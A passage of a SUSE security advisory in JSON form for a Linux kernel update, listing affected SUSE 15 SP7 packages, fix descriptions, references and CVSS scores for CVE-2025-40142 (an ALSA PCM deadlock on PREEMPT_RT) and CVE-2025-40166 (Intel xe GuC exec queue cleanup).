"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40136"
},
{
"cve": "CVE-2025-40142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Disable bottom softirqs as part of spin_lock_irq() on PREEMPT_RT\n\nsnd_pcm_group_lock_irq() acquires a spinlock_t and disables interrupts\nvia spin_lock_irq(). This also implicitly disables the handling of\nsoftirqs such as TIMER_SOFTIRQ.\nOn PREEMPT_RT softirqs are preemptible and spin_lock_irq() does not\ndisable them. That means a timer can be invoked during spin_lock_irq()\non the same CPU. Due to synchronisations reasons local_bh_disable() has\na per-CPU lock named softirq_ctrl.lock which synchronizes individual\nsoftirq against each other.\nsyz-bot managed to trigger a lockdep report where softirq_ctrl.lock is\nacquired in hrtimer_cancel() in addition to hrtimer_run_softirq(). This\nis a possible deadlock.\n\nThe softirq_ctrl.lock can not be made part of spin_lock_irq() as this\nwould lead to too much synchronisation against individual threads on the\nsystem. To avoid the possible deadlock, softirqs must be manually\ndisabled before the lock is acquired.\n\nDisable softirqs before the lock is acquired on PREEMPT_RT.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40142",
"url": "https://www.suse.com/security/cve/CVE-2025-40142"
},
{
"category": "external",
"summary": "SUSE Bug 1253348 for CVE-2025-40142",
"url": "https://bugzilla.suse.com/1253348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40142"
},
{
"cve": "CVE-2025-40166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/guc: Check GuC running state before deregistering exec queue\n\nIn normal operation, a registered exec queue is disabled and\nderegistered through the GuC, and freed only after the GuC confirms\ncompletion. However, if the driver is forced to unbind while the exec\nqueue is still running, the user may call exec_destroy() after the GuC\nhas already been stopped and CT communication disabled.\n\nIn this case, the driver cannot receive a response from the GuC,\npreventing proper cleanup of exec queue resources. Fix this by directly\nreleasing the resources when GuC is not running.\n\nHere is the failure dmesg log:\n\"\n[ 468.089581] ---[ end trace 0000000000000000 ]---\n[ 468.089608] pci 0000:03:00.0: [drm] *ERROR* GT0: GUC ID manager unclean (1/65535)\n[ 468.090558] pci 0000:03:00.0: [drm] GT0: total 65535\n[ 468.090562] pci 0000:03:00.0: [drm] GT0: used 1\n[ 468.090564] pci 0000:03:00.0: [drm] GT0: range 1..1 (1)\n[ 468.092716] ------------[ cut here ]------------\n[ 468.092719] WARNING: CPU: 14 PID: 4775 at drivers/gpu/drm/xe/xe_ttm_vram_mgr.c:298 ttm_vram_mgr_fini+0xf8/0x130 [xe]\n\"\n\nv2: use xe_uc_fw_is_running() instead of xe_guc_ct_enabled().\n As CT may go down and come back during VF migration.\n\n(cherry picked from commit 9b42321a02c50a12b2beb6ae9469606257fbecea)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
